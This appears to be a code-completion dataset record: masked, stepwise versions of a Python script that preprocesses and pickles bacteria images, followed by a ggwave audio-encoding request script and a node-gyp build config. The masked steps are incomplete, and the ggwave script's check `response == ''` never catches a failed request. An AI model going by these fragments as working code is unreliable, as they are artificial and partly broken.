{ "blob_id": "28c4c09b81d63785750cee36a8efd77760cac451", "index": 7231, "step-1": "<mask token>\n\n\ndef rotate_img(image, angle, color, filter=Image.NEAREST):\n if image.mode == 'P' or filter == Image.NEAREST:\n matte = Image.new('1', image.size, 1)\n else:\n matte = Image.new('L', image.size, 255)\n bg = Image.new(image.mode, image.size, color)\n bg.paste(image.rotate(angle, filter), matte.rotate(angle, filter))\n return bg\n\n\ndef make_greyscale_white_bg(im, r, b, g):\n im = im.convert('RGBA')\n data = np.array(im)\n red, green, blue, alpha = data.T\n grey_areas = (red == r) & (blue == b) & (green == g)\n data[..., :-1][grey_areas.T] = 255, 255, 255\n im2 = Image.fromarray(data)\n im2 = im2.convert('L')\n return im2\n\n\n<mask token>\n\n\ndef maybe_pickle(data_folders, min_num_images_per_class, force=False):\n dataset_names = []\n folders_list = os.listdir(data_folders)\n for folder in folders_list:\n curr_folder_path = os.path.join(data_folders, folder)\n if os.path.isdir(curr_folder_path):\n set_filename = curr_folder_path + '.pickle'\n dataset_names.append(set_filename)\n if os.path.exists(set_filename) and not force:\n print('%s already present - Skipping pickling.' % set_filename)\n else:\n print('Pickling %s.' % set_filename)\n dataset = load_letter(curr_folder_path,\n min_num_images_per_class)\n try:\n with open(set_filename, 'wb') as f:\n pickle.dump(dataset, f, pickle.HIGHEST_PROTOCOL)\n f.close()\n except Exception as e:\n print('Unable to save data to', set_filename, ':', e)\n return dataset_names\n\n\n<mask token>\n\n\ndef merge_datasets(pickle_files, train_size, valid_size=0):\n num_classes = len(pickle_files)\n valid_dataset, valid_labels = make_arrays(valid_size, image_size)\n train_dataset, train_labels = make_arrays(train_size, image_size)\n vsize_per_class = valid_size // num_classes\n tsize_per_class = train_size // num_classes\n start_v, start_t = 0, 0\n end_v, end_t = vsize_per_class, tsize_per_class\n end_l = vsize_per_class + tsize_per_class\n for label, pickle_file in enumerate(pickle_files):\n try:\n with open(pickle_file, 'rb') as f:\n letter_set = pickle.load(f)\n f.close()\n np.random.shuffle(letter_set)\n if valid_dataset is not None:\n valid_letter = letter_set[:vsize_per_class, :, :]\n valid_dataset[start_v:end_v, :, :] = valid_letter\n valid_labels[start_v:end_v] = label\n start_v += vsize_per_class\n end_v += vsize_per_class\n train_letter = letter_set[vsize_per_class:end_l, :, :]\n train_dataset[start_t:end_t, :, :] = train_letter\n train_labels[start_t:end_t] = label\n start_t += tsize_per_class\n end_t += tsize_per_class\n except Exception as e:\n print('Unable to process data from', pickle_file, ':', e)\n raise\n return valid_dataset, valid_labels, train_dataset, train_labels\n\n\n<mask token>\n\n\ndef randomize(dataset, labels):\n permutation = np.random.permutation(labels.shape[0])\n shuffled_dataset = dataset[permutation, :, :]\n shuffled_labels = labels[permutation]\n return shuffled_dataset, shuffled_labels\n\n\n<mask token>\n", "step-2": "<mask token>\n\n\ndef rotate_img(image, angle, color, filter=Image.NEAREST):\n if image.mode == 'P' or filter == Image.NEAREST:\n matte = Image.new('1', image.size, 1)\n else:\n matte = Image.new('L', image.size, 255)\n bg = Image.new(image.mode, image.size, color)\n bg.paste(image.rotate(angle, filter), matte.rotate(angle, filter))\n return bg\n\n\ndef make_greyscale_white_bg(im, r, b, g):\n im = im.convert('RGBA')\n data = np.array(im)\n red, green, blue, alpha = data.T\n grey_areas = (red == r) & (blue == b) & (green == g)\n data[..., :-1][grey_areas.T] = 255, 255, 255\n im2 = Image.fromarray(data)\n im2 = im2.convert('L')\n return im2\n\n\ndef process_images(folder):\n classes = [os.path.join(folder, d) for d in sorted(os.listdir(folder))]\n img_cnt = 0\n for class_x in classes:\n if os.path.isdir(class_x):\n images = [os.path.join(class_x, i) for i in sorted(os.listdir(\n class_x)) if i != '.DS_Store']\n for image in images:\n img_cnt = img_cnt + 1\n if img_cnt % 1000 == 0:\n print('Processed %s images' % str(img_cnt))\n im = Image.open(image)\n im = im.resize(dimensions)\n im.save(image)\n print('Finished processing images, images found = ')\n print(img_cnt)\n\n\n<mask token>\n\n\ndef load_letter(folder, min_num_images):\n image_files = os.listdir(folder)\n dataset = np.ndarray(shape=(len(image_files), image_size, image_size, 3\n ), dtype=np.float32)\n print(dataset.shape)\n num_images = 0\n for image_index, image in enumerate(image_files):\n image_file = os.path.join(folder, image)\n try:\n image_data = (ndimage.imread(image_file).astype(float) - \n pixel_depth / 2) / pixel_depth\n print(image_data.shape)\n if image_data.shape != (image_size, image_size, 3):\n raise Exception('Unexpected image shape: %s' % str(\n image_data.shape))\n dataset[num_images, :, :] = image_data\n num_images = num_images + 1\n except IOError as e:\n print('Could not read:', image_file, ':', e, \"- it's ok, skipping.\"\n )\n dataset = dataset[0:num_images, :, :]\n if num_images < min_num_images:\n raise Exception('Many fewer images than expected: %d < %d' % (\n num_images, min_num_images))\n print('Full dataset tensor:', dataset.shape)\n print('Mean:', np.mean(dataset))\n print('Standard deviation:', np.std(dataset))\n return dataset\n\n\ndef maybe_pickle(data_folders, min_num_images_per_class, force=False):\n dataset_names = []\n folders_list = os.listdir(data_folders)\n for folder in folders_list:\n curr_folder_path = os.path.join(data_folders, folder)\n if os.path.isdir(curr_folder_path):\n set_filename = curr_folder_path + '.pickle'\n dataset_names.append(set_filename)\n if os.path.exists(set_filename) and not force:\n print('%s already present - Skipping pickling.' % set_filename)\n else:\n print('Pickling %s.' % set_filename)\n dataset = load_letter(curr_folder_path,\n min_num_images_per_class)\n try:\n with open(set_filename, 'wb') as f:\n pickle.dump(dataset, f, pickle.HIGHEST_PROTOCOL)\n f.close()\n except Exception as e:\n print('Unable to save data to', set_filename, ':', e)\n return dataset_names\n\n\n<mask token>\n\n\ndef make_arrays(nb_rows, img_size):\n if nb_rows:\n dataset = np.ndarray((nb_rows, img_size, img_size, 3), dtype=np.float32\n )\n labels = np.ndarray(nb_rows, dtype=np.int32)\n else:\n dataset, labels = None, None\n return dataset, labels\n\n\ndef merge_datasets(pickle_files, train_size, valid_size=0):\n num_classes = len(pickle_files)\n valid_dataset, valid_labels = make_arrays(valid_size, image_size)\n train_dataset, train_labels = make_arrays(train_size, image_size)\n vsize_per_class = valid_size // num_classes\n tsize_per_class = train_size // num_classes\n start_v, start_t = 0, 0\n end_v, end_t = vsize_per_class, tsize_per_class\n end_l = vsize_per_class + tsize_per_class\n for label, pickle_file in enumerate(pickle_files):\n try:\n with open(pickle_file, 'rb') as f:\n letter_set = pickle.load(f)\n f.close()\n np.random.shuffle(letter_set)\n if valid_dataset is not None:\n valid_letter = letter_set[:vsize_per_class, :, :]\n valid_dataset[start_v:end_v, :, :] = valid_letter\n valid_labels[start_v:end_v] = label\n start_v += vsize_per_class\n end_v += vsize_per_class\n train_letter = letter_set[vsize_per_class:end_l, :, :]\n train_dataset[start_t:end_t, :, :] = train_letter\n train_labels[start_t:end_t] = label\n start_t += tsize_per_class\n end_t += tsize_per_class\n except Exception as e:\n print('Unable to process data from', pickle_file, ':', e)\n raise\n return valid_dataset, valid_labels, train_dataset, train_labels\n\n\n<mask token>\n\n\ndef randomize(dataset, labels):\n permutation = np.random.permutation(labels.shape[0])\n shuffled_dataset = dataset[permutation, :, :]\n shuffled_labels = labels[permutation]\n return shuffled_dataset, shuffled_labels\n\n\n<mask token>\n", "step-3": "<mask token>\n\n\ndef rotate_img(image, angle, color, filter=Image.NEAREST):\n if image.mode == 'P' or filter == Image.NEAREST:\n matte = Image.new('1', image.size, 1)\n else:\n matte = Image.new('L', image.size, 255)\n bg = Image.new(image.mode, image.size, color)\n bg.paste(image.rotate(angle, filter), matte.rotate(angle, filter))\n return bg\n\n\ndef make_greyscale_white_bg(im, r, b, g):\n im = im.convert('RGBA')\n data = np.array(im)\n red, green, blue, alpha = data.T\n grey_areas = (red == r) & (blue == b) & (green == g)\n data[..., :-1][grey_areas.T] = 255, 255, 255\n im2 = Image.fromarray(data)\n im2 = im2.convert('L')\n return im2\n\n\ndef process_images(folder):\n classes = [os.path.join(folder, d) for d in sorted(os.listdir(folder))]\n img_cnt = 0\n for class_x in classes:\n if os.path.isdir(class_x):\n images = [os.path.join(class_x, i) for i in sorted(os.listdir(\n class_x)) if i != '.DS_Store']\n for image in images:\n img_cnt = img_cnt + 1\n if img_cnt % 1000 == 0:\n print('Processed %s images' % str(img_cnt))\n im = Image.open(image)\n im = im.resize(dimensions)\n im.save(image)\n print('Finished processing images, images found = ')\n print(img_cnt)\n\n\nprocess_images(test_folder)\nprocess_images(train_folder)\nprint('ok')\n<mask token>\n\n\ndef load_letter(folder, min_num_images):\n image_files = os.listdir(folder)\n dataset = np.ndarray(shape=(len(image_files), image_size, image_size, 3\n ), dtype=np.float32)\n print(dataset.shape)\n num_images = 0\n for image_index, image in enumerate(image_files):\n image_file = os.path.join(folder, image)\n try:\n image_data = (ndimage.imread(image_file).astype(float) - \n pixel_depth / 2) / pixel_depth\n print(image_data.shape)\n if image_data.shape != (image_size, image_size, 3):\n raise Exception('Unexpected image shape: %s' % str(\n image_data.shape))\n dataset[num_images, :, :] = image_data\n num_images = num_images + 1\n except IOError as e:\n print('Could not read:', image_file, ':', e, \"- it's ok, skipping.\"\n )\n dataset = dataset[0:num_images, :, :]\n if num_images < min_num_images:\n raise Exception('Many fewer images than expected: %d < %d' % (\n num_images, min_num_images))\n print('Full dataset tensor:', dataset.shape)\n print('Mean:', np.mean(dataset))\n print('Standard deviation:', np.std(dataset))\n return dataset\n\n\ndef maybe_pickle(data_folders, min_num_images_per_class, force=False):\n dataset_names = []\n folders_list = os.listdir(data_folders)\n for folder in folders_list:\n curr_folder_path = os.path.join(data_folders, folder)\n if os.path.isdir(curr_folder_path):\n set_filename = curr_folder_path + '.pickle'\n dataset_names.append(set_filename)\n if os.path.exists(set_filename) and not force:\n print('%s already present - Skipping pickling.' % set_filename)\n else:\n print('Pickling %s.' % set_filename)\n dataset = load_letter(curr_folder_path,\n min_num_images_per_class)\n try:\n with open(set_filename, 'wb') as f:\n pickle.dump(dataset, f, pickle.HIGHEST_PROTOCOL)\n f.close()\n except Exception as e:\n print('Unable to save data to', set_filename, ':', e)\n return dataset_names\n\n\n<mask token>\n\n\ndef make_arrays(nb_rows, img_size):\n if nb_rows:\n dataset = np.ndarray((nb_rows, img_size, img_size, 3), dtype=np.float32\n )\n labels = np.ndarray(nb_rows, dtype=np.int32)\n else:\n dataset, labels = None, None\n return dataset, labels\n\n\ndef merge_datasets(pickle_files, train_size, valid_size=0):\n num_classes = len(pickle_files)\n valid_dataset, valid_labels = make_arrays(valid_size, image_size)\n train_dataset, train_labels = make_arrays(train_size, image_size)\n vsize_per_class = valid_size // num_classes\n tsize_per_class = train_size // num_classes\n start_v, start_t = 0, 0\n end_v, end_t = vsize_per_class, tsize_per_class\n end_l = vsize_per_class + tsize_per_class\n for label, pickle_file in enumerate(pickle_files):\n try:\n with open(pickle_file, 'rb') as f:\n letter_set = pickle.load(f)\n f.close()\n np.random.shuffle(letter_set)\n if valid_dataset is not None:\n valid_letter = letter_set[:vsize_per_class, :, :]\n valid_dataset[start_v:end_v, :, :] = valid_letter\n valid_labels[start_v:end_v] = label\n start_v += vsize_per_class\n end_v += vsize_per_class\n train_letter = letter_set[vsize_per_class:end_l, :, :]\n train_dataset[start_t:end_t, :, :] = train_letter\n train_labels[start_t:end_t] = label\n start_t += tsize_per_class\n end_t += tsize_per_class\n except Exception as e:\n print('Unable to process data from', pickle_file, ':', e)\n raise\n return valid_dataset, valid_labels, train_dataset, train_labels\n\n\n<mask token>\nprint('Training:', train_dataset.shape, train_labels.shape)\nprint('Validation:', valid_dataset.shape, valid_labels.shape)\n\n\ndef randomize(dataset, labels):\n permutation = np.random.permutation(labels.shape[0])\n shuffled_dataset = dataset[permutation, :, :]\n shuffled_labels = labels[permutation]\n return shuffled_dataset, shuffled_labels\n\n\n<mask token>\ntry:\n f = open(pickle_file, 'wb')\n save = {'train_dataset': train_dataset, 'train_labels': train_labels,\n 'valid_dataset': valid_dataset, 'valid_labels': valid_labels}\n pickle.dump(save, f, pickle.HIGHEST_PROTOCOL)\n f.close()\nexcept Exception as e:\n print('Unable to save data to', pickle_file, ':', e)\n raise\n<mask token>\nprint('Compressed pickle size:', statinfo.st_size)\n", "step-4": "from __future__ import print_function\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport os\nimport sys\nimport tarfile\nimport tensorflow as tf\nfrom IPython.display import display, Image\nfrom scipy import ndimage\nfrom sklearn.linear_model import LogisticRegression\nfrom six.moves.urllib.request import urlretrieve\nfrom six.moves import cPickle as pickle\nfrom PIL import Image\nfrom six.moves import range\ntrain_folder = './data/train'\ntest_folder = './data/valid'\ndimensions = 229, 229\nmax_angle = 15\n\n\ndef rotate_img(image, angle, color, filter=Image.NEAREST):\n if image.mode == 'P' or filter == Image.NEAREST:\n matte = Image.new('1', image.size, 1)\n else:\n matte = Image.new('L', image.size, 255)\n bg = Image.new(image.mode, image.size, color)\n bg.paste(image.rotate(angle, filter), matte.rotate(angle, filter))\n return bg\n\n\ndef make_greyscale_white_bg(im, r, b, g):\n im = im.convert('RGBA')\n data = np.array(im)\n red, green, blue, alpha = data.T\n grey_areas = (red == r) & (blue == b) & (green == g)\n data[..., :-1][grey_areas.T] = 255, 255, 255\n im2 = Image.fromarray(data)\n im2 = im2.convert('L')\n return im2\n\n\ndef process_images(folder):\n classes = [os.path.join(folder, d) for d in sorted(os.listdir(folder))]\n img_cnt = 0\n for class_x in classes:\n if os.path.isdir(class_x):\n images = [os.path.join(class_x, i) for i in sorted(os.listdir(\n class_x)) if i != '.DS_Store']\n for image in images:\n img_cnt = img_cnt + 1\n if img_cnt % 1000 == 0:\n print('Processed %s images' % str(img_cnt))\n im = Image.open(image)\n im = im.resize(dimensions)\n im.save(image)\n print('Finished processing images, images found = ')\n print(img_cnt)\n\n\nprocess_images(test_folder)\nprocess_images(train_folder)\nprint('ok')\nimage_size = 229\npixel_depth = 255.0\n\n\ndef load_letter(folder, min_num_images):\n image_files = os.listdir(folder)\n dataset = np.ndarray(shape=(len(image_files), image_size, image_size, 3\n ), dtype=np.float32)\n print(dataset.shape)\n num_images = 0\n for image_index, image in enumerate(image_files):\n image_file = os.path.join(folder, image)\n try:\n image_data = (ndimage.imread(image_file).astype(float) - \n pixel_depth / 2) / pixel_depth\n print(image_data.shape)\n if image_data.shape != (image_size, image_size, 3):\n raise Exception('Unexpected image shape: %s' % str(\n image_data.shape))\n dataset[num_images, :, :] = image_data\n num_images = num_images + 1\n except IOError as e:\n print('Could not read:', image_file, ':', e, \"- it's ok, skipping.\"\n )\n dataset = dataset[0:num_images, :, :]\n if num_images < min_num_images:\n raise Exception('Many fewer images than expected: %d < %d' % (\n num_images, min_num_images))\n print('Full dataset tensor:', dataset.shape)\n print('Mean:', np.mean(dataset))\n print('Standard deviation:', np.std(dataset))\n return dataset\n\n\ndef maybe_pickle(data_folders, min_num_images_per_class, force=False):\n dataset_names = []\n folders_list = os.listdir(data_folders)\n for folder in folders_list:\n curr_folder_path = os.path.join(data_folders, folder)\n if os.path.isdir(curr_folder_path):\n set_filename = curr_folder_path + '.pickle'\n dataset_names.append(set_filename)\n if os.path.exists(set_filename) and not force:\n print('%s already present - Skipping pickling.' % set_filename)\n else:\n print('Pickling %s.' % set_filename)\n dataset = load_letter(curr_folder_path,\n min_num_images_per_class)\n try:\n with open(set_filename, 'wb') as f:\n pickle.dump(dataset, f, pickle.HIGHEST_PROTOCOL)\n f.close()\n except Exception as e:\n print('Unable to save data to', set_filename, ':', e)\n return dataset_names\n\n\ntrain_datasets = maybe_pickle(train_folder, 89, True)\ntest_datasets = maybe_pickle(test_folder, 10, True)\n\n\ndef make_arrays(nb_rows, img_size):\n if nb_rows:\n dataset = np.ndarray((nb_rows, img_size, img_size, 3), dtype=np.float32\n )\n labels = np.ndarray(nb_rows, dtype=np.int32)\n else:\n dataset, labels = None, None\n return dataset, labels\n\n\ndef merge_datasets(pickle_files, train_size, valid_size=0):\n num_classes = len(pickle_files)\n valid_dataset, valid_labels = make_arrays(valid_size, image_size)\n train_dataset, train_labels = make_arrays(train_size, image_size)\n vsize_per_class = valid_size // num_classes\n tsize_per_class = train_size // num_classes\n start_v, start_t = 0, 0\n end_v, end_t = vsize_per_class, tsize_per_class\n end_l = vsize_per_class + tsize_per_class\n for label, pickle_file in enumerate(pickle_files):\n try:\n with open(pickle_file, 'rb') as f:\n letter_set = pickle.load(f)\n f.close()\n np.random.shuffle(letter_set)\n if valid_dataset is not None:\n valid_letter = letter_set[:vsize_per_class, :, :]\n valid_dataset[start_v:end_v, :, :] = valid_letter\n valid_labels[start_v:end_v] = label\n start_v += vsize_per_class\n end_v += vsize_per_class\n train_letter = letter_set[vsize_per_class:end_l, :, :]\n train_dataset[start_t:end_t, :, :] = train_letter\n train_labels[start_t:end_t] = label\n start_t += tsize_per_class\n end_t += tsize_per_class\n except Exception as e:\n print('Unable to process data from', pickle_file, ':', e)\n raise\n return valid_dataset, valid_labels, train_dataset, train_labels\n\n\ntrain_size = 89\nvalid_size = 10\nvalid_dataset, valid_labels, train_dataset, train_labels = merge_datasets(\n train_datasets, train_size, valid_size)\nprint('Training:', train_dataset.shape, train_labels.shape)\nprint('Validation:', valid_dataset.shape, valid_labels.shape)\n\n\ndef randomize(dataset, labels):\n permutation = np.random.permutation(labels.shape[0])\n shuffled_dataset = dataset[permutation, :, :]\n shuffled_labels = labels[permutation]\n return shuffled_dataset, shuffled_labels\n\n\ntrain_dataset, train_labels = randomize(train_dataset, train_labels)\nvalid_dataset, valid_labels = randomize(valid_dataset, valid_labels)\npickle_file = './bacteria.pickle'\ntry:\n f = open(pickle_file, 'wb')\n save = {'train_dataset': train_dataset, 'train_labels': train_labels,\n 'valid_dataset': valid_dataset, 'valid_labels': valid_labels}\n pickle.dump(save, f, pickle.HIGHEST_PROTOCOL)\n f.close()\nexcept Exception as e:\n print('Unable to save data to', pickle_file, ':', e)\n raise\nstatinfo = os.stat(pickle_file)\nprint('Compressed pickle size:', statinfo.st_size)\n", "step-5": "\r\nfrom __future__ import print_function\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nimport os\r\nimport sys\r\nimport tarfile\r\nimport tensorflow as tf\r\nfrom IPython.display import display, Image\r\nfrom scipy import ndimage\r\nfrom sklearn.linear_model import LogisticRegression\r\nfrom six.moves.urllib.request import urlretrieve\r\nfrom six.moves import cPickle as pickle\r\nfrom PIL import Image\r\nfrom six.moves import range\r\n\r\ntrain_folder = './data/train'\r\ntest_folder = './data/valid'\r\ndimensions = (229, 229)\r\nmax_angle = 15\r\n\r\n\r\n# rotating image\r\ndef rotate_img(image, angle, color, filter = Image.NEAREST):\r\n\r\n if image.mode == \"P\" or filter == Image.NEAREST:\r\n matte = Image.new(\"1\", image.size, 1) # mask\r\n else:\r\n matte = Image.new(\"L\", image.size, 255) # true matte\r\n bg = Image.new(image.mode, image.size, color)\r\n bg.paste(\r\n image.rotate(angle, filter),\r\n matte.rotate(angle, filter)\r\n )\r\n return bg\r\n\r\n# make gray_scale image or 1channel image\r\ndef make_greyscale_white_bg(im, r, b, g):\r\n\r\n im = im.convert('RGBA') # Convert to RGBA\r\n\r\n\r\n data = np.array(im) # \"data\" is a height x width x 4 numpy array\r\n red, green, blue, alpha = data.T # Temporarily unpack the bands for readability\r\n\r\n # Replace grey with white... (leaves alpha values alone...)\r\n grey_areas = (red == r) & (blue == b) & (green == g)\r\n data[..., :-1][grey_areas.T] = (255, 255, 255) # Transpose back needed\r\n\r\n im2 = Image.fromarray(data)\r\n im2 = im2.convert('L') # convert to greyscale image\r\n\r\n\r\n\r\n #im2.show()\r\n\r\n return im2\r\n\r\ndef process_images(folder):\r\n\r\n classes = [os.path.join(folder, d) for d in sorted(os.listdir(folder))] # get list of all sub-folders in folder\r\n img_cnt = 0\r\n\r\n for class_x in classes:\r\n\r\n if os.path.isdir(class_x):\r\n\r\n # get paths to all the images in this folder\r\n images = [os.path.join(class_x, i) for i in sorted(os.listdir(class_x)) if i != '.DS_Store']\r\n\r\n\r\n for image in images:\r\n\r\n img_cnt = img_cnt + 1\r\n\r\n if(img_cnt % 1000 == 0):\r\n print(\"Processed %s images\" % str(img_cnt))\r\n\r\n im = Image.open(image)\r\n im = im.resize(dimensions) # resize image according to dimensions set\r\n im.save(image) # overwrite previous image file with new image\r\n\r\n print(\"Finished processing images, images found = \")\r\n print(img_cnt)\r\n\r\n\r\nprocess_images(test_folder)\r\nprocess_images(train_folder)\r\n\r\nprint('ok')\r\n\r\nimage_size = 229 # Pixel width and height.\r\npixel_depth = 255.0 # Number of levels per pixel.\r\n\r\n\r\ndef load_letter(folder, min_num_images):\r\n\r\n\r\n image_files = os.listdir(folder)\r\n dataset = np.ndarray(shape=(len(image_files), image_size, image_size, 3), dtype=np.float32)\r\n print(dataset.shape)\r\n\r\n num_images = 0\r\n for image_index, image in enumerate(image_files):\r\n image_file = os.path.join(folder, image)\r\n try:\r\n image_data = (ndimage.imread(image_file).astype(float) - pixel_depth / 2) / pixel_depth\r\n print(image_data.shape)\r\n\r\n if image_data.shape != (image_size, image_size, 3):\r\n raise Exception('Unexpected image shape: %s' % str(image_data.shape))\r\n dataset[num_images, :, :] = image_data\r\n num_images = num_images + 1\r\n except IOError as e:\r\n print('Could not read:', image_file, ':', e, '- it\\'s ok, skipping.')\r\n\r\n dataset = dataset[0:num_images, :, :]\r\n if num_images < min_num_images:\r\n raise Exception('Many fewer images than expected: %d < %d' %\r\n (num_images, min_num_images))\r\n\r\n print('Full dataset tensor:', dataset.shape)\r\n print('Mean:', np.mean(dataset))\r\n print('Standard deviation:', np.std(dataset))\r\n return dataset\r\n\r\ndef maybe_pickle(data_folders, min_num_images_per_class, force=False):\r\n dataset_names = []\r\n folders_list = os.listdir(data_folders)\r\n for folder in folders_list:\r\n\r\n\r\n #print(os.path.join(data_folders, folder))\r\n curr_folder_path = os.path.join(data_folders, folder)\r\n if os.path.isdir(curr_folder_path):\r\n set_filename = curr_folder_path + '.pickle'\r\n dataset_names.append(set_filename)\r\n if os.path.exists(set_filename) and not force:\r\n # # You may override by setting force=True.\r\n print('%s already present - Skipping pickling.' % set_filename)\r\n else:\r\n print('Pickling %s.' % set_filename)\r\n dataset = load_letter(curr_folder_path, min_num_images_per_class)\r\n try:\r\n with open(set_filename, 'wb') as f:\r\n pickle.dump(dataset, f, pickle.HIGHEST_PROTOCOL)\r\n f.close()\r\n except Exception as e:\r\n print('Unable to save data to', set_filename, ':', e)\r\n\r\n return dataset_names\r\n\r\ntrain_datasets = maybe_pickle(train_folder, 89, True)\r\ntest_datasets = maybe_pickle(test_folder, 10, True)\r\n\r\n\r\ndef make_arrays(nb_rows, img_size):\r\n if nb_rows:\r\n dataset = np.ndarray((nb_rows, img_size, img_size, 3), dtype=np.float32)\r\n labels = np.ndarray(nb_rows, dtype=np.int32)\r\n else:\r\n dataset, labels = None, None\r\n return dataset, labels\r\n\r\ndef merge_datasets(pickle_files, train_size, valid_size=0):\r\n num_classes = len(pickle_files)\r\n valid_dataset, valid_labels = make_arrays(valid_size, image_size)\r\n train_dataset, train_labels = make_arrays(train_size, image_size)\r\n vsize_per_class = valid_size // num_classes\r\n tsize_per_class = train_size // num_classes\r\n\r\n start_v, start_t = 0, 0\r\n end_v, end_t = vsize_per_class, tsize_per_class\r\n end_l = vsize_per_class+tsize_per_class\r\n for label, pickle_file in enumerate(pickle_files):\r\n try:\r\n with open(pickle_file, 'rb') as f:\r\n letter_set = pickle.load(f)\r\n f.close()\r\n # let's shuffle the letters to have random validation and training set\r\n np.random.shuffle(letter_set)\r\n if valid_dataset is not None:\r\n valid_letter = letter_set[:vsize_per_class, :, :]\r\n valid_dataset[start_v:end_v, :, :] = valid_letter\r\n valid_labels[start_v:end_v] = label\r\n start_v += vsize_per_class\r\n end_v += vsize_per_class\r\n\r\n train_letter = letter_set[vsize_per_class:end_l, :, :]\r\n train_dataset[start_t:end_t, :, :] = train_letter\r\n train_labels[start_t:end_t] = label\r\n start_t += tsize_per_class\r\n end_t += tsize_per_class\r\n except Exception as e:\r\n print('Unable to process data from', pickle_file, ':', e)\r\n raise\r\n\r\n return valid_dataset, valid_labels, train_dataset, train_labels\r\n\r\n\r\ntrain_size = 89\r\nvalid_size = 10\r\n\r\n\r\nvalid_dataset, valid_labels, train_dataset, train_labels = merge_datasets(\r\n train_datasets, train_size, valid_size)\r\n# _, _, test_dataset, test_labels = merge_datasets(test_datasets, test_size)\r\n\r\nprint('Training:', train_dataset.shape, train_labels.shape)\r\nprint('Validation:', valid_dataset.shape, valid_labels.shape)\r\n# print('Testing:', test_dataset.shape, test_labels.shape)\r\n\r\ndef randomize(dataset, labels):\r\n permutation = np.random.permutation(labels.shape[0])\r\n shuffled_dataset = dataset[permutation,:,:]\r\n shuffled_labels = labels[permutation]\r\n return shuffled_dataset, shuffled_labels\r\ntrain_dataset, train_labels = randomize(train_dataset, train_labels)\r\n# test_dataset, test_labels = randomize(test_dataset, test_labels)\r\nvalid_dataset, valid_labels = randomize(valid_dataset, valid_labels)\r\n\r\n\r\npickle_file = './bacteria.pickle'\r\n\r\ntry:\r\n f = open(pickle_file, 'wb')\r\n save = {\r\n 'train_dataset': train_dataset,\r\n 'train_labels': train_labels,\r\n 'valid_dataset': valid_dataset,\r\n 'valid_labels': valid_labels,\r\n }\r\n pickle.dump(save, f, pickle.HIGHEST_PROTOCOL)\r\n f.close()\r\nexcept Exception as e:\r\n print('Unable to save data to', pickle_file, ':', e)\r\n raise\r\n\r\n\r\nstatinfo = os.stat(pickle_file)\r\nprint('Compressed pickle size:', statinfo.st_size)\r\n", "step-ids": [ 5, 8, 9, 11, 12 ] }
[ 5, 8, 9, 11, 12 ]
import sys import requests def ggwave(message: str, protocolId: int = 1, sampleRate: float = 48000, volume: int = 50, payloadLength: int = -1): url = 'https://ggwave-to-file.ggerganov.com/' params = { 'm': message, # message to encode 'p': protocolId, # transmission protocol to use 's': sampleRate, # output sample rate 'v': volume, # output volume 'l': payloadLength, # if positive - use fixed-length encoding } response = requests.get(url, params=params) if response == '': raise SyntaxError('Request failed') return response result = ggwave("Hello world!") sys.stdout.buffer.write(result.content)
normal
{ "blob_id": "f5d285b3a82151b5d7efdcd07d56cc5aaaac5836", "index": 7213, "step-1": "<mask token>\n\n\ndef ggwave(message: str, protocolId: int=1, sampleRate: float=48000, volume:\n int=50, payloadLength: int=-1):\n url = 'https://ggwave-to-file.ggerganov.com/'\n params = {'m': message, 'p': protocolId, 's': sampleRate, 'v': volume,\n 'l': payloadLength}\n response = requests.get(url, params=params)\n if response == '':\n raise SyntaxError('Request failed')\n return response\n\n\n<mask token>\n", "step-2": "<mask token>\n\n\ndef ggwave(message: str, protocolId: int=1, sampleRate: float=48000, volume:\n int=50, payloadLength: int=-1):\n url = 'https://ggwave-to-file.ggerganov.com/'\n params = {'m': message, 'p': protocolId, 's': sampleRate, 'v': volume,\n 'l': payloadLength}\n response = requests.get(url, params=params)\n if response == '':\n raise SyntaxError('Request failed')\n return response\n\n\n<mask token>\nsys.stdout.buffer.write(result.content)\n", "step-3": "<mask token>\n\n\ndef ggwave(message: str, protocolId: int=1, sampleRate: float=48000, volume:\n int=50, payloadLength: int=-1):\n url = 'https://ggwave-to-file.ggerganov.com/'\n params = {'m': message, 'p': protocolId, 's': sampleRate, 'v': volume,\n 'l': payloadLength}\n response = requests.get(url, params=params)\n if response == '':\n raise SyntaxError('Request failed')\n return response\n\n\nresult = ggwave('Hello world!')\nsys.stdout.buffer.write(result.content)\n", "step-4": "import sys\nimport requests\n\n\ndef ggwave(message: str, protocolId: int=1, sampleRate: float=48000, volume:\n int=50, payloadLength: int=-1):\n url = 'https://ggwave-to-file.ggerganov.com/'\n params = {'m': message, 'p': protocolId, 's': sampleRate, 'v': volume,\n 'l': payloadLength}\n response = requests.get(url, params=params)\n if response == '':\n raise SyntaxError('Request failed')\n return response\n\n\nresult = ggwave('Hello world!')\nsys.stdout.buffer.write(result.content)\n", "step-5": "import sys\nimport requests\n\ndef ggwave(message: str, protocolId: int = 1, sampleRate: float = 48000, volume: int = 50, payloadLength: int = -1):\n\n url = 'https://ggwave-to-file.ggerganov.com/'\n\n params = {\n 'm': message, # message to encode\n 'p': protocolId, # transmission protocol to use\n 's': sampleRate, # output sample rate\n 'v': volume, # output volume\n 'l': payloadLength, # if positive - use fixed-length encoding\n }\n\n response = requests.get(url, params=params)\n\n if response == '':\n raise SyntaxError('Request failed')\n\n return response\n\nresult = ggwave(\"Hello world!\")\n\nsys.stdout.buffer.write(result.content)\n", "step-ids": [ 1, 2, 3, 4, 5 ] }
[ 1, 2, 3, 4, 5 ]
<|reserved_special_token_0|> <|reserved_special_token_1|> {'targets': [{'target_name': 'force-layout', 'sources': ['src/main.cc', 'src/layout.cc', 'src/quadTree.cc'], 'conditions': [['OS=="win"', { 'cflags': ['/WX', '/std:latest', '/m']}, {'cflags': ['-std=c++11', '-fpermissive', '-fexceptions']}]], 'cflags!': ['-fno-exceptions'], 'cflags_cc!': ['-fno-exceptions']}]} <|reserved_special_token_1|> { "targets": [ { "target_name": "force-layout", "sources": [ "src/main.cc", "src/layout.cc", "src/quadTree.cc" ], 'conditions': [ ['OS=="win"', { 'cflags': [ '/WX', "/std:latest", "/m" ], }, { # OS != "win" 'cflags': [ "-std=c++11", "-fpermissive", "-fexceptions" ], }], ], 'cflags!': [ '-fno-exceptions' ], 'cflags_cc!': [ '-fno-exceptions' ] } ] }
flexible
